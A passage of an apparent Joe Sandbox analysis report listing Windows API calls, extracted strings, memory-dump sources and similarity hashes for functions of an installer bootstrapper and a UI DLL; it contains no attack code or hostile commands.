                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000616), ref: 6A56A7F5
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,00000000,?,?,00000616), ref: 6A56A829
                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000,?,?,00000616), ref: 6A56A833
                                                                                                                                                                                                                                                                          • IsRectEmpty.USER32(?,?,?,00000616), ref: 6A56A850
                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,?,00000616), ref: 6A56A880
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$ItemLong$RectShow$ClientMessageSendText$Empty
                                                                                                                                                                                                                                                                          • String ID: Details <<$Details >>
                                                                                                                                                                                                                                                                          • API String ID: 263192859-3763984547
                                                                                                                                                                                                                                                                          • Opcode ID: 65c8dc0e1744d0de7ef8f75bf905783ac089ef82e42b4d1deb03140c402536c5
                                                                                                                                                                                                                                                                          • Instruction ID: 8e1f46ae44b58fdfa20e030a833782af91451a8593ca5b5dfe1194994229e396
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65c8dc0e1744d0de7ef8f75bf905783ac089ef82e42b4d1deb03140c402536c5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C617D71A00208ABDB15DFA9CC45BAEBBF5FF88704F158619F612A7291DB31A845CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(?,DF534560,?,?,?,003B1425,000000FF,?,002F4FDF,?,?,?,00000000), ref: 002C4AE8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • MSINEWINSTANCE=1 , xrefs: 002C56F6
                                                                                                                                                                                                                                                                          • "%s" TRANSFORMS="%s;%s;%s" AI_INST_PRODCODES=%s AI_INTANCE_LOCATION="%s" AI_INST_MAJORUPGRADE=1 , xrefs: 002C5AEF
                                                                                                                                                                                                                                                                          • TRANSFORMS=:%s.mst MSINEWINSTANCE=1 , xrefs: 002C5720
                                                                                                                                                                                                                                                                          • "%s" TRANSFORMS="%s;%s" AI_INST_MAJORUPGRADE=1 AI_NEWINST=1 , xrefs: 002C5628
                                                                                                                                                                                                                                                                          • Lt=, xrefs: 002C58AF
                                                                                                                                                                                                                                                                          • TRANSFORMS=":%s.mst;%s" MSINEWINSTANCE=1 , xrefs: 002C570F
                                                                                                                                                                                                                                                                          • majorupgrade-content.mst, xrefs: 002C5566, 002C5A5F
                                                                                                                                                                                                                                                                          • AI_INST_PRODCODES=%s AI_INTANCE_LOCATION="%s" AI_INST_MAJORUPGRADE=1 , xrefs: 002C59A5
                                                                                                                                                                                                                                                                          • TRANSFORMS="%s" AI_INST_MAJORUPGRADE=1, xrefs: 002C56C7
                                                                                                                                                                                                                                                                          • Lt=, xrefs: 002C57A2
                                                                                                                                                                                                                                                                          • .msi, xrefs: 002C5557, 002C5A50
                                                                                                                                                                                                                                                                          • REINSTALL=ALL REINSTALLMODE=vomus , xrefs: 002C5BA3
                                                                                                                                                                                                                                                                          • %s , xrefs: 002C585C, 002C5B91
                                                                                                                                                                                                                                                                          • "%s" TRANSFORMS="%s;%s;%s" AI_INST_MAJORUPGRADE=1 AI_NEWINST=1 , xrefs: 002C55C2
                                                                                                                                                                                                                                                                          • .mst, xrefs: 002C55A7, 002C560E, 002C5ACE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$DebugHeapOutputProcessString
                                                                                                                                                                                                                                                                          • String ID: "%s" TRANSFORMS="%s;%s" AI_INST_MAJORUPGRADE=1 AI_NEWINST=1 $ "%s" TRANSFORMS="%s;%s;%s" AI_INST_MAJORUPGRADE=1 AI_NEWINST=1 $ "%s" TRANSFORMS="%s;%s;%s" AI_INST_PRODCODES=%s AI_INTANCE_LOCATION="%s" AI_INST_MAJORUPGRADE=1 $ %s $ AI_INST_PRODCODES=%s AI_INTANCE_LOCATION="%s" AI_INST_MAJORUPGRADE=1 $ MSINEWINSTANCE=1 $ REINSTALL=ALL REINSTALLMODE=vomus $ TRANSFORMS="%s" AI_INST_MAJORUPGRADE=1$ TRANSFORMS=":%s.mst;%s" MSINEWINSTANCE=1 $ TRANSFORMS=:%s.mst MSINEWINSTANCE=1 $.msi$.mst$Lt=$Lt=$majorupgrade-content.mst
                                                                                                                                                                                                                                                                          • API String ID: 1673903050-4135639292
                                                                                                                                                                                                                                                                          • Opcode ID: 1e30df428531343de962ecb73911fe170a1465639ee5751041d19a62d77f2db9
                                                                                                                                                                                                                                                                          • Instruction ID: 4ad638b11ff7b55d1ea79ab352acaa7009139fe71740290e7a6015193e9568d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e30df428531343de962ecb73911fe170a1465639ee5751041d19a62d77f2db9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B951CF75A002469FDB14DF6CC854BAEBBF4EF45321F1482ADE815AB392EB309D00CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A565C90: LoadLibraryW.KERNEL32(ComCtl32.dll,AA831995), ref: 6A565CC4
                                                                                                                                                                                                                                                                            • Part of subcall function 6A565C90: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 6A565CE7
                                                                                                                                                                                                                                                                            • Part of subcall function 6A565C90: FreeLibrary.KERNEL32(00000000), ref: 6A565D47
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000001F4,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A536
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000170,00000000,00000000,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A547
                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000,0000005A,00000048,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A54F
                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A556
                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000009,00000000), ref: 6A56A55F
                                                                                                                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,Courier New), ref: 6A56A588
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000001F6,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A599
                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A5A2
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,?,00000000,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A5B9
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000001F8,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A5C3
                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A5D4
                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A5E7
                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?,?,?,?,?,?,?,?,?,?,6A56A4DE,?), ref: 6A56A5F7
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$ItemRect$LibraryMessageSend$AddressCapsCreateDeviceFontFreeLoadProc
                                                                                                                                                                                                                                                                          • String ID: Courier New
                                                                                                                                                                                                                                                                          • API String ID: 1731048342-2572734833
                                                                                                                                                                                                                                                                          • Opcode ID: 336c82076efa66a894ec3c6e7d77f9810e564f07f00312fc3a32f5caef45b693
                                                                                                                                                                                                                                                                          • Instruction ID: 728ca21fa43c32e3f4b13d530a1543a9f41a4d95ca7b2cdd5f26b11a65e46f57
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 336c82076efa66a894ec3c6e7d77f9810e564f07f00312fc3a32f5caef45b693
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A4187717803087BEA14DF258C46FAE77E8BF99B04F021519FB06BA1D1DBB0AD408B55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,DF534560,?,?,00000000,?,?,?,?,?,?,DF534560,003729C5,000000FF), ref: 001BCC6D
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 001BCC73
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?,?,?,?,?,DF534560,003729C5,000000FF,?,00207EDA,003DFD3C,DF534560,DF534560), ref: 001BCCA3
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 001BCCA9
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$Lt=$RoGetActivationFactory$combase.dll
                                                                                                                                                                                                                                                                          • API String ID: 2574300362-2712652403
                                                                                                                                                                                                                                                                          • Opcode ID: 165d31aba01822b82401058a7235b1eddaa6d7b9db98f005d8f31d17a3dca89d
                                                                                                                                                                                                                                                                          • Instruction ID: 95f8ae19bc66b94e334c55b243fcb393db8d44c76e83371f2ba4f206ff396414
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 165d31aba01822b82401058a7235b1eddaa6d7b9db98f005d8f31d17a3dca89d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8A16C71A00209EFDF15DFA8C995BEEBFF4AF58314F144129E415EB291DB70AA44CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,DF534560,?,?,?,?,?,?,?,DF534560,00372BE5,000000FF,?,001BD7DA,003D8D14), ref: 001BD527
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 001BD52D
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?,?,?,?,DF534560,00372BE5,000000FF,?,001BD7DA,003D8D14,DF534560,DF534560), ref: 001BD55E
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 001BD564
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$Lt=$RoGetActivationFactory$combase.dll
                                                                                                                                                                                                                                                                          • API String ID: 2574300362-2712652403
                                                                                                                                                                                                                                                                          • Opcode ID: 328fae4fd33206b5ade7c51d4775a96d211a1b571c00fa30100e5f24e7ef4338
                                                                                                                                                                                                                                                                          • Instruction ID: 0f12beff269b2241644985ca0594f132ad37be392defd0ee02b02b41f32db2f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 328fae4fd33206b5ade7c51d4775a96d211a1b571c00fa30100e5f24e7ef4338
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C81A171D00208EFDF19DFA8D995BEEBBB4EF48314F144129F415A7291EB74A904CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,001E8EE0,003DB978,00000000,?), ref: 001E8E5A
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001E8E73
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001E8E89
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000), ref: 001E903B
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 001E9041
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000), ref: 001E90BA
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 001E90C0
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 001E9298
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$Process$FreeInit_thread_footer$CloseConcurrency::cancel_current_taskCreateHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                                          • String ID: v=$Lt=$Lt=$t=
                                                                                                                                                                                                                                                                          • API String ID: 370743205-1593079143
                                                                                                                                                                                                                                                                          • Opcode ID: 50785b246ff0f7e8589cad8bf7e882d9c352daac89dba27b3c98244569840e43
                                                                                                                                                                                                                                                                          • Instruction ID: 42ec457248fed89ae7cf8acb2f69ec9bb26a0307d0daabf959124c3401566305
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50785b246ff0f7e8589cad8bf7e882d9c352daac89dba27b3c98244569840e43
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90027C70D00749DFDB15CFA9C945BEEBBB8FF44304F248159E915AB281DB74AA04CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0,?,?,?,?), ref: 6A569BEF
                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0,?,?), ref: 6A569C00
                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000,?,?), ref: 6A569C12
                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC,?,?), ref: 6A569C25
                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000,?,?), ref: 6A569C34
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000007F,00000000,00000000,?,?), ref: 6A569C48
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000,?,0000007F,00000000,00000000,?,?), ref: 6A569C57
                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?,?,?), ref: 6A569C6E
                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?,?,?,?,?), ref: 6A569C92
                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?,?,?,?,?), ref: 6A569C96
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?,?,?,?,?), ref: 6A569CD2
                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000,?,?,?,?,?,?), ref: 6A569CDD
                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?,?,?,?,?,?,?), ref: 6A569CF8
                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002,?,?,?,?,?,?), ref: 6A569D09
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$Long$Rect$ClientMessageSend$ItemPoints
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3417004906-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2cb65f8fdecc1428bed2a95e6b00c09b8bea1698ace50699152b855620c60e56
                                                                                                                                                                                                                                                                          • Instruction ID: d780d2a4d2bf1f80d9829f10c7a73ece2f0ab426779973b692b1ca12aa8cb12f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cb65f8fdecc1428bed2a95e6b00c09b8bea1698ace50699152b855620c60e56
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3441AF75608305DFE720DF69C844B2AB7F4BF99710F114A1EF596D2191DB30E8848B62
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 002E8690: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,002E683A,?,DF534560,?,?,?,000000FF,?,002E61F4), ref: 002E869D
                                                                                                                                                                                                                                                                            • Part of subcall function 002E8690: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,002E683A,?,DF534560,?,?,?,000000FF,?,002E61F4,?), ref: 002E86BE
                                                                                                                                                                                                                                                                            • Part of subcall function 002E8690: GetLastError.KERNEL32(?,DF534560,?,?,?,000000FF,?,002E61F4,?,?,00000000,00000000,DF534560,?,?), ref: 002E871E
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?,00000000,003B874D), ref: 002E690A
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 002E6929
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(DF534560,000000FF), ref: 002E6930
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9120: FindResourceW.KERNEL32(00000000,?,00000006,-00000010,?,?,001BCB50,-00000010,?,002F55F7,00000008,DF534560), ref: 001B9143
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Event$CreateInit_thread_footerObjectSingleWait$ErrorFindHeapLastProcessResetResource
                                                                                                                                                                                                                                                                          • String ID: GET$P)?$SVWhh'?$X)?$X)?$attachment$d'?$filename
                                                                                                                                                                                                                                                                          • API String ID: 818129584-3773666332
                                                                                                                                                                                                                                                                          • Opcode ID: 4bdea09fe35df2d45773cfb5f6bfa3a7755014f4fc3ba13d4af0e87b2c08cc50
                                                                                                                                                                                                                                                                          • Instruction ID: 9358c23feade0946390d58d151f315dcb3e326eb40a5908d1e29a90907e1f272
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdea09fe35df2d45773cfb5f6bfa3a7755014f4fc3ba13d4af0e87b2c08cc50
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5402BC70A1028ADFDB10DFA9C848BEEBBF4FF24314F548169E515AB391DB709A04CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB,AA831995), ref: 6A56A2B4
                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 6A56A300
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569D50: IsWindowVisible.USER32(?,00000000,?,75A88510,00000000), ref: 6A569D66
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569D50: SendMessageW.USER32(?,0000000B,00000000,00000000,?,00000000,?,75A88510,00000000), ref: 6A569D82
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569D50: GetWindowLongW.USER32(?,000000F0,?,00000000,?,75A88510,00000000), ref: 6A569D88
                                                                                                                                                                                                                                                                            • Part of subcall function 6A569D50: GetDlgItem.USER32(?,?,?,000000F0,?,00000000,?,75A88510,00000000), ref: 6A569DFA
